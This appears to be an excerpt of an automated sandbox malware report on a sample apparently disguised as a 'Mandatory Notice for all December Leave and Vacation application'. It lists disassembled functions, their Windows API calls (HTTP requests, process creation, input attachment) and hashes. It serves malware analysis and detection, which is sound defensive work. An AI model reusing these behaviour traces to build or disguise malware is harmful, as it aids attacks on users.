                                                      • Opcode Fuzzy Hash: ef0bad3c9dd8b455e0cfb8d647b335cefa3a6a763590dd4b26e78587b083eebb
                                                      • Instruction Fuzzy Hash: A0C13571608301EFC700EFA4C884A6AB7EABF89304F08495EF5899B351DB71ED05DB52
                                                      Function 00FAACB3 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __lock.LIBCMT ref: 00FAACC1
                                                        • Part of subcall function 00FA7CF4: __mtinitlocknum.LIBCMT ref: 00FA7D06
                                                        • Part of subcall function 00FA7CF4: EnterCriticalSection.KERNEL32(00000000,?,00FA7ADD,0000000D), ref: 00FA7D1F
                                                      • __calloc_crt.LIBCMT ref: 00FAACD2
                                                        • Part of subcall function 00FA6986: __calloc_impl.LIBCMT ref: 00FA6995
                                                        • Part of subcall function 00FA6986: Sleep.KERNEL32(00000000,000003BC,00F9F507,?,0000000E), ref: 00FA69AC
                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 00FAACED
                                                      • GetStartupInfoW.KERNEL32(?,01036E28,00000064,00FA5E91,01036C70,00000014), ref: 00FAAD46
                                                      • __calloc_crt.LIBCMT ref: 00FAAD91
                                                      • GetFileType.KERNEL32(00000001), ref: 00FAADD8
                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00FAAE11
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                      • String ID:
                                                      • API String ID: 1426640281-0
                                                      • Opcode ID: 9b586a938b66fdb9bd6dbcd91317640453b6ad0c59abb4c170ad9c0249b64b07
                                                      • Instruction ID: 10a59ade33361d0ff077e1b59c7c26adc457ac4602dd56d52aa88642d4224aa2
                                                      • Opcode Fuzzy Hash: 9b586a938b66fdb9bd6dbcd91317640453b6ad0c59abb4c170ad9c0249b64b07
                                                      • Instruction Fuzzy Hash: 2481B1F1D053458FDB24CF68C9805A9BBF0AF0A330B24425DE4A6AB3C5D7399807EB61
                                                      Function 00FC67E9 Relevance: 15.1, APIs: 10, Instructions: 107windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __swprintf.LIBCMT ref: 00FC67FD
                                                      • __swprintf.LIBCMT ref: 00FC680A
                                                        • Part of subcall function 00FA172B: __woutput_l.LIBCMT ref: 00FA1784
                                                      • FindResourceW.KERNEL32(?,?,0000000E), ref: 00FC6834
                                                      • LoadResource.KERNEL32(?,00000000), ref: 00FC6840
                                                      • LockResource.KERNEL32(00000000), ref: 00FC684D
                                                      • FindResourceW.KERNEL32(?,?,00000003), ref: 00FC686D
                                                      • LoadResource.KERNEL32(?,00000000), ref: 00FC687F
                                                      • SizeofResource.KERNEL32(?,00000000), ref: 00FC688E
                                                      • LockResource.KERNEL32(?), ref: 00FC689A
                                                      • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00FC68F9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                      • String ID:
                                                      • API String ID: 1433390588-0
                                                      • Opcode ID: 825f27f54ea79792927e8845caf0bfa552c82f176b5ca4fa31ed9580f7ea5c71
                                                      • Instruction ID: 077b6f964a31279e52ca215a9c46084b79ff29e086d8e56326e0ac00aa88f230
                                                      • Opcode Fuzzy Hash: 825f27f54ea79792927e8845caf0bfa552c82f176b5ca4fa31ed9580f7ea5c71
                                                      • Instruction Fuzzy Hash: F53162B590421BABDB219FA0DE45EBA7BA8FF08355F004429F941D2180E779D951EB70
                                                      Function 00FC4025 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 00FC4047
                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00FC30A5,?,00000001), ref: 00FC405B
                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 00FC4062
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00FC30A5,?,00000001), ref: 00FC4071
                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00FC4083
                                                      • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00FC30A5,?,00000001), ref: 00FC409C
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00FC30A5,?,00000001), ref: 00FC40AE
                                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00FC30A5,?,00000001), ref: 00FC40F3
                                                      • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00FC30A5,?,00000001), ref: 00FC4108
                                                      • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00FC30A5,?,00000001), ref: 00FC4113
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                      • String ID:
                                                      • API String ID: 2156557900-0
                                                      • Opcode ID: 6ce6f9e9f36b3569c8e902e2194f4b08faa6a3b589e5045ed438df04761d549d
                                                      • Instruction ID: c3f748f5f4c4a30af5ea38c7180b357d30855a7bbbcb2e5334a18e5259b54c49
                                                      • Opcode Fuzzy Hash: 6ce6f9e9f36b3569c8e902e2194f4b08faa6a3b589e5045ed438df04761d549d
                                                      • Instruction Fuzzy Hash: 2A3127B5900215AFDB32CF95DE97F6977B9BB54321F148009F984CA284CB7AEC408F64
                                                      Function 00FFDD4A Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetSysColor.USER32(00000008), ref: 00F9B496
                                                      • SetTextColor.GDI32(?,000000FF), ref: 00F9B4A0
                                                      • SetBkMode.GDI32(?,00000001), ref: 00F9B4B5
                                                      • GetStockObject.GDI32(00000005), ref: 00F9B4BD
                                                      • GetClientRect.USER32(?), ref: 00FFDD63
                                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 00FFDD7A
                                                      • GetWindowDC.USER32(?), ref: 00FFDD86
                                                      • GetPixel.GDI32(00000000,?,?), ref: 00FFDD95
                                                      • ReleaseDC.USER32(?,00000000), ref: 00FFDDA7
                                                      • GetSysColor.USER32(00000005), ref: 00FFDDC5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                      • String ID:
                                                      • API String ID: 3430376129-0
                                                      • Opcode ID: adac0254f1a9fbe7afca6d587c2d3ece0a242b2d72da5ab0fd6ce32c722ae356
                                                      • Instruction ID: dc92256b84fa926eb00cdda70012a5f7d531bce895b01741bf57eb40dd69bb81
                                                      • Opcode Fuzzy Hash: adac0254f1a9fbe7afca6d587c2d3ece0a242b2d72da5ab0fd6ce32c722ae356
                                                      • Instruction Fuzzy Hash: 71114C31500205BFEB226FE4EC08BE97F61EB08336F108665FAA6950E5CB760951EB20
                                                      Function 00FBCB82 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • EnumChildWindows.USER32(?,00FBCF50), ref: 00FBCE90
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ChildEnumWindows
                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                      • API String ID: 3555792229-1603158881
                                                      • Opcode ID: 31c9795130dcc6f6fe0ec88a191a67bc98bab286601ff6d9cf27f1d8097ac500
                                                      • Instruction ID: 1b2130341c9912e59c987103b4cd6fc6cbc69a46d5bc600555c5df5d5bf58285
                                                      • Opcode Fuzzy Hash: 31c9795130dcc6f6fe0ec88a191a67bc98bab286601ff6d9cf27f1d8097ac500
                                                      • Instruction Fuzzy Hash: D0917171A00506EBDB18EF61C882BEBFB75BF04310F508519E499A7251DF34A959EFE0
                                                      Function 00F83093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00F830DC
                                                      • CoUninitialize.OLE32(?,00000000), ref: 00F83181
                                                      • UnregisterHotKey.USER32(?), ref: 00F832A9
                                                      • DestroyWindow.USER32(?), ref: 00FF5079
                                                      • FreeLibrary.KERNEL32(?), ref: 00FF50F8
                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00FF5125
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                      • String ID: close all
                                                      • API String ID: 469580280-3243417748
                                                      • Opcode ID: f96c228a5542ee686cff33779c001d454c83bdb19dc65e734fa7c4f61a9a5a38
                                                      • Instruction ID: 637f8bee3bdb9b432507ee7c049da58853512d89add9f0c19ac7e5e5fc1b578a
                                                      • Opcode Fuzzy Hash: f96c228a5542ee686cff33779c001d454c83bdb19dc65e734fa7c4f61a9a5a38
                                                      • Instruction Fuzzy Hash: 32913A346006068FC715FF64C899BA8F3A4FF04B14F5441A9E50AA7272DF38AE56EF50
                                                      Function 00F9CB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetWindowLongW.USER32(?,000000EB), ref: 00F9CC15
                                                        • Part of subcall function 00F9CCCD: GetClientRect.USER32(?,?), ref: 00F9CCF6
                                                        • Part of subcall function 00F9CCCD: GetWindowRect.USER32(?,?), ref: 00F9CD37
                                                        • Part of subcall function 00F9CCCD: ScreenToClient.USER32(?,?), ref: 00F9CD5F
                                                      • GetDC.USER32 ref: 00FFD137
                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00FFD14A
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00FFD158
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00FFD16D
                                                      • ReleaseDC.USER32(?,00000000), ref: 00FFD175
                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00FFD200
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                      • String ID: U
                                                      • API String ID: 4009187628-3372436214
                                                      • Opcode ID: 855a7555610b533c569fae0cb5dd8385501a05f26bcc1e1ebad7bde92972deb2
                                                      • Instruction ID: be9ea3068d0c9fffc3d5ebddd8a0daab3084b89563fa0c99174296e7b8fb1983
                                                      • Opcode Fuzzy Hash: 855a7555610b533c569fae0cb5dd8385501a05f26bcc1e1ebad7bde92972deb2
                                                      • Instruction Fuzzy Hash: 0171E431800209DFEF21DF64CC81ABA7BB6FF48364F144269EE55562AAC7359841EFA0
                                                      Function 00FEECD4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F9B34E: GetWindowLongW.USER32(?,000000EB), ref: 00F9B35F
                                                        • Part of subcall function 00F9B63C: GetCursorPos.USER32(000000FF), ref: 00F9B64F
                                                        • Part of subcall function 00F9B63C: ScreenToClient.USER32(00000000,000000FF), ref: 00F9B66C
                                                        • Part of subcall function 00F9B63C: GetAsyncKeyState.USER32(00000001), ref: 00F9B691
                                                        • Part of subcall function 00F9B63C: GetAsyncKeyState.USER32(00000002), ref: 00F9B69F
                                                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 00FEED3C
                                                      • ImageList_EndDrag.COMCTL32 ref: 00FEED42
                                                      • ReleaseCapture.USER32 ref: 00FEED48
                                                      • SetWindowTextW.USER32(?,00000000), ref: 00FEEDF0
                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00FEEE03
                                                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 00FEEEDC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                      • API String ID: 1924731296-2107944366
                                                      • Opcode ID: 3c76eb7053717bc56d824c5ca05841a69fa24ac41d07011751c56cf46f474946
                                                      • Instruction ID: 3682f998338632c20eaee33881eecf11ca2f741748d0ba6abe467f470b5b16e7
                                                      • Opcode Fuzzy Hash: 3c76eb7053717bc56d824c5ca05841a69fa24ac41d07011751c56cf46f474946
                                                      • Instruction Fuzzy Hash: D251B974204304AFD720EF60DC86FAA77E4BB88714F00491DF595972A2DB79E944DB62
                                                      Function 00FD45C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00FD45FF
                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00FD462B
                                                      • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00FD466D
                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00FD4682
                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FD468F
                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00FD46BF
                                                      • InternetCloseHandle.WININET(00000000), ref: 00FD4706
                                                        • Part of subcall function 00FD5052: GetLastError.KERNEL32(?,?,00FD43CC,00000000,00000000,00000001), ref: 00FD5067
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                      • String ID:
                                                      • API String ID: 1241431887-3916222277
                                                      • Opcode ID: 7fe18f0fa6553b0c4c1db4289af7c54501316a51d811642b7d309c840f9ced39
                                                      • Instruction ID: 1a20e2abe4fc04e94fda21d29a5cbcdf22745d938c565de99998b46cc69b0e99
                                                      • Opcode Fuzzy Hash: 7fe18f0fa6553b0c4c1db4289af7c54501316a51d811642b7d309c840f9ced39
                                                      • Instruction Fuzzy Hash: A241A2B1900209BFEB128F90CC89FBB77ADFF09314F084116F94696281E775E944ABA4
                                                      Function 00FDB644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0101DC00), ref: 00FDB715
                                                      • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0101DC00), ref: 00FDB749
                                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00FDB8C1
                                                      • SysFreeString.OLEAUT32(?), ref: 00FDB8EB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                      • String ID:
                                                      • API String ID: 560350794-0
                                                      • Opcode ID: 0a1063956f08bc4d7b589fedfef17be6bff695669b548bc42f186437edcab84e
                                                      • Instruction ID: 67e74f14b3f94762aee9c30745645b8e0f16c9c4c82f2acb202a9980bf29bc2c
                                                      • Opcode Fuzzy Hash: 0a1063956f08bc4d7b589fedfef17be6bff695669b548bc42f186437edcab84e
                                                      • Instruction Fuzzy Hash: E2F12B75A00109EFCF04DF94C884EAEB7BAFF49311F158459F915AB250DB35AE42EBA0
                                                      Function 00FE24D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 00FE24F5
                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00FE2688
                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00FE26AC
                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00FE26EC
                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00FE270E
                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00FE286F
                                                      • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00FE28A1
                                                      • CloseHandle.KERNEL32(?), ref: 00FE28D0
                                                      • CloseHandle.KERNEL32(?), ref: 00FE2947
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                      • String ID:
                                                      • API String ID: 4090791747-0
                                                      • Opcode ID: a21ea30ba6eb501deabdd9aa6e081e62d6bbcf7493934dd30dc1df77114b3ded
                                                      • Instruction ID: c24ff7afb575e58e0a11c4d8a6822fd61d58908a995c43ea9039bf5bf8e1131f
                                                      • Opcode Fuzzy Hash: a21ea30ba6eb501deabdd9aa6e081e62d6bbcf7493934dd30dc1df77114b3ded
                                                      • Instruction Fuzzy Hash: F2D1D031604341DFDB15EF25C891B6EBBE9AF84320F18845DF8999B2A2DB35DC40EB52
                                                      Function 00FEB33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00FEB3F4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: InvalidateRect
                                                      • String ID:
                                                      • API String ID: 634782764-0
                                                      • Opcode ID: 47ce32500f6601850dac58da889886afa10682041e92a0dfb5060230756fee60
                                                      • Instruction ID: 15f1338cb180b5064e18ef5305341bf162a98ba31884dc11c1796b4e7f1098ec
                                                      • Opcode Fuzzy Hash: 47ce32500f6601850dac58da889886afa10682041e92a0dfb5060230756fee60
                                                      • Instruction Fuzzy Hash: 4E51E531A05284BFEF309F6ACC86BAF3B64EB05324F244012F654E61E6C775E940EB51
                                                      Function 00F9A699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00FFDB1B
                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00FFDB3C
                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00FFDB51
                                                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00FFDB6E
                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00FFDB95
                                                      • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00F9A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00FFDBA0
                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00FFDBBD
                                                      • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00F9A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00FFDBC8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                      • String ID:
                                                      • API String ID: 1268354404-0
                                                      • Opcode ID: 86f348b488fbf1aa08b572a65d6b3f6bf2cf5b418c9b058328b61a2493d1dd5f
